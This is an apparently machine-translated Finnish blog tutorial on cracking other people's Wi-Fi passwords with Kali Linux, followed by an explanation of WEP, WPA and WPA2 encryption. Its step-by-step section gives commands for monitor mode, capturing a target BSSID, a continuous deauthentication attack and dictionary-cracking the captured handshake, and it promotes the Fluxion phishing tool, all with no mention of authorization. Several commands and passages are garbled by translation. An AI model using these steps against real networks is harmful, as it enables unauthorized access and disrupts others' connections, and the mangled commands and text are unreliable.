Miten Hakata Wifi Käyttämällä Kali Linux?

eniten Googlessa kysytään, miten Wifi hakkeroidaan Kali Linuxilla, miten wifi hakkeroidaan Kali Linuxilla jne. Mutta ensin ymmärtää, mikä on Wifi & sen salaus.

viestin sisältö

mikä on Wi-Fi ja on mahdollista hakata sitä?

Wi-Fi on nimitys suositulle langattomalle verkkotekniikalle, joka käyttää radioaaltoja langattomien nopeiden Internet-ja verkkoyhteyksien tarjoamiseen. Yleinen harhaluulo on, että termi Wi-Fi on lyhyt ”langaton uskollisuus”, mutta näin ei ole. Wi-Fi on yksinkertaisesti tavaramerkittyä lausetta, joka tarkoittaa IEEE 802.11 x.

kun puhutaan wifi hakkerointi mistä tahansa laitteesta, että wifi turvallisuus on tärkeintä. Joten kun yritämme hakata wifi se on erittäin helppo murtaa tai hakata salasana WPS käytettävissä järjestelmä. WPS on yksi salaustyypeistä, jota käytetään wifi-verkon suojaamiseen, joten aloitetaan pikaohjauksella.

työkalut, joita käytetään WiFi-salasanan hakkerointiin Kali-Linuxissa

pääasiassa käytämme Kali Linuxin sisäänrakennettua työkalusarjaa wifi-salasanan hakkerointiin, joka on seuraava:

  • airmon-ng
  • aireplay-ng
  • airodump-ng
  • hccap
  • John the ripper
  • aircrack-ng

Airmon-ng

tätä kirjoitusta voidaan käyttää Ota käyttöön näyttötila langattomissa liitännöissä. Sitä voidaan käyttää myös palata monitoritilasta hallittuun tilaan. Airmon-ng-komennon syöttäminen ilman parametreja näyttää rajapintojen tilan.

käyttö: airmon-ng <start|stop> <interface> tai airmon-ng <check|check kill>

Aireplay-ng

Aireplay-ng käytetään kehysten pistämiseen.

ensisijainen tehtävä on tuottaa liikennettä myöhempää käyttöä varten aircrack-ng: ssä WEP-ja WPA-PSK-avainten murtamiseen. On olemassa erilaisia hyökkäyksiä, jotka voivat aiheuttaa deauthentications varten syömällä WPA kädenpuristus tietoja, fake authentications, interaktiivinen paketti replay, käsityönä ARP pyynnön injektio ja ARP-pyyntö reinjection. Packetforge-ng-työkalulla on mahdollista luoda mielivaltaisia kehyksiä.

useimmat kuljettajat on paikattava, jotta he voivat antaa pistoksen.

Airodump-ng

Airodump-ng: tä käytetään raw 802.11-kehysten paketointiin ja se soveltuu erityisesti WEP IVs: n (Alustusvektori) keräämiseen, jotta niitä voidaan käyttää aircrack-ng: n kanssa. Jos tietokoneeseen on kytketty GPS-vastaanotin, airodump-ng pystyy kirjaamaan löydettyjen tukiasemien koordinaatit.

lisäksi airodump-ng kirjoittaa useita tiedostoja, jotka sisältävät tiedot kaikista näkyneistä tukiasemista ja asiakkaista.

Hccap

muuttaa aircrack-ng-kaappaushashit muotoon.hccapx käytämme tätä komentoa.

Viiltäjä-John

salasanan murtamiseen käytämme viimeisessä vaiheessa Viiltäjä-Johnia. käytämme tätä työkalua verrata hashes kanssa salasana sanakirja. On monia muitakin tapoja, mutta kokeilemme yhtä niistä.

Aircrack-ng

Aircrack-ng on täydellinen sarja työkaluja WiFi-verkon turvallisuuden arviointiin.

se keskittyy WiFi-tietoturvan eri osa-alueisiin:

  • seuranta: Pakettikaappaus ja tietojen vienti tekstitiedostoihin jatkokäsittelyä varten kolmannen osapuolen työkaluilla
  • Attacking: Replay attacks, deauthentication, fake access points and others via packet injection
  • Testing: Checking WiFi cards and driver capacities (capture and injection)
  • Cracking: WEP and WPA PSK (WPA 1 ja 2)

vaiheet hakata WiFi Kali-Linux tai muiden Debian Linux OS.

kaikki komennot, joissa on kuvaus, on annettu edellä, tarkista, että jos sinulla on ongelmia.

Vaihe 1 :

ota ensin verkkokorttisi monitoritilaan seurataksesi ympäröiviä verkkoja.

#airmon-ng start wlan1

1
2

#airodump-ng wlan1mon

3
4

Vaihe 2:

#airodump-ng –bssid 2C:55:D3:B1:35:0C-c 1-w kalip300 wlan1mon

5
6

Vaihe 3:

#aireplay – ng -0 0-a 2C: 55: D3:B1: 35:0C wlan1mon

7

kun olemme kaapata sucsessfully handshak tiedosto näemme jotain tällaista.

8

Vaihe 4:

#aircrack-ng kalip300-01.cap-J john

9

Vaihe 5:

#hccap2john john.hccap > wpa

Vaihe 6:

#john-wordlist* / root/Desktop / rockyou.txt / root / Desktop/wpa

And we sucsessfully hack the wifi password by kali linux

Wifi Hacking Tool :- Fluxion

Fluxion on tietoturvan auditointi-ja sosiaalitekniikan tutkimusväline. Se on uusintaversio linsetistä vk496: lla, jossa on (toivottavasti) vähemmän vikoja ja enemmän toimintoja. Skripti yrittää hakea WPA/WPA2-avaimen kohteen tukiasemasta social engineering (phishing) – hyökkäyksen avulla. Se on yhteensopiva Kalin uusimman julkaisun (rolling) kanssa. Fluxionin hyökkäysten asetukset ovat enimmäkseen manuaalisia, mutta kokeellinen automaattitila hoitaa osan hyökkäysten asetusparametreista. Lue FAQ ennen kysymyksiä.

Wireless Encryption

WEP Encryption

Wired Equivalent Privacy (WEP) on IEEE 802.11: n langaton protokolla, joka tarjoaa tietoturva-algoritmeja tietojen luottamuksellisuuteen langattomien siirtojen aikana.

WEP käyttää 24-bittistä Alustusvektoria(IV) stream cipher RC4: n muodostamiseen luottamuksellisuuden varmistamiseksi ja CRC-32: n tarkistussummaa langattoman lähetyksen grgity-suhteen.

miten WEP toimii

  1. CRC-32 tarkistussummaa käytetään laskettaessa 32-bittistä eheyden Tarkistusarvoa (ICV) datalle, joka puolestaan lisätään tietokehykseen.

2. WEP-avaimeen lisätään 24-bittinen mielivaltainen luku, joka tunnetaan Alustusvektorina (IV); WEP-avainta ja IV: tä kutsutaan yhdessä WEP-seediksi.

3. WEP-siementä käytetään syötteenä RC4-algoritmiin avainvirran tuottamiseksi (avainvirtaa Xoroidaan bittiavaruudessa datan ja ICV: n yhdistelmällä salatun datan tuottamiseksi).

4. IV-kenttä (IV+PAD+KID) lisätään salakirjoitustekstiin luomaan MAC Frame

miten WEP toimii

WPA-salaus

Wi-Fi Protected Access (WPA) on 802: een perustuva wlanin tietojen salausmenetelmä.11 standardia.

se on 802.11 i: n tilannekuva (kehitteillä), joka tarjoaa vahvemman salauksen ja mahdollistaa PSK: n EAP-todennuksen.

miten WPA toimii

Temporal encryption key, transmit address, and TKIP sequence counter (TSC) käytetään syötteenä RC4-algoritmiin keystramin luomiseksi.

MAC Service Data Unit (MSDU) ja message intergrity check (MIC) yhdistetään Michael-algoritmilla.

MSDU: n ja MIC: n yhdistelmä pirstoutuu Mac Protocol Data Unitin (MPDU) tuottamiseksi.

32-bittinen Eheystarkistusarvo (ICV) lasketaan MPDU: lle

MPDU: n ja ICV: n yhdistelmä xororoidaan bitwisesti Keysteamilla salatun datan tuottamiseksi

IV lisätään salattuun dataan MAC-kehyksen luomiseksi.

WPA 2-salaus

WPA 2 tarjoaa yrityksille ja WI-FI-käyttäjille vahvemman tietosuojan ja verkon kulunvalvonnan

tarjoaa valtion turvaa toteuttamalla National Institute of Standards and Technology (NIST) FIPS 140-2-yhteensopivan AES-salausalgoritmin.

WPA2 – Personal

WPA2 – Personal Käyttää set-up-salasanaa (pre-shared Key) luvattoman verkkoyhteyden suojaamiseen.

PSK-tilassa jokainen Langattoman verkon laite salaa verkkoliikenteen käyttäen 128-bittistä avainta, joka on johdettu 8-63 ASCII-merkin salauslauseesta.

WPA2-Enterprise

se sisältää EAP: n tai RADIUS: n keskitettyyn asiakkaan todennukseen käyttäen useita todennusmenetelmiä, kuten token-kortteja, Kerberos-kortteja, varmenteita jne.

käyttäjät saavat keskitetyltä palvelimelta kirjautumistiedot, jotka heidän on esitettävä verkkoon yhdistettäessä.

miten WPA2 toimii

WPA2: n CCMP-toteutuksessa Mac-otsikkotietoja käytetään additional authentication datan (AAD) rakentamiseen.

nonce: n rakentamiseen käytetään sekvensoitua pakettinumeroa (PN).

aad, temporal key ja nonce yhdessä CCMP: n kanssa käytetään tiedon salaukseen.

WPA2: n Mac-runko rakennetaan käyttäen MAC-otsikkoa, CCMP-otsikkoa, salattua dataa ja salattua mikrofonia

 miten WPA2 toimii

saatat missata miten hakkeroida puhelin

Write a Comment

Sähköpostiosoitettasi ei julkaista.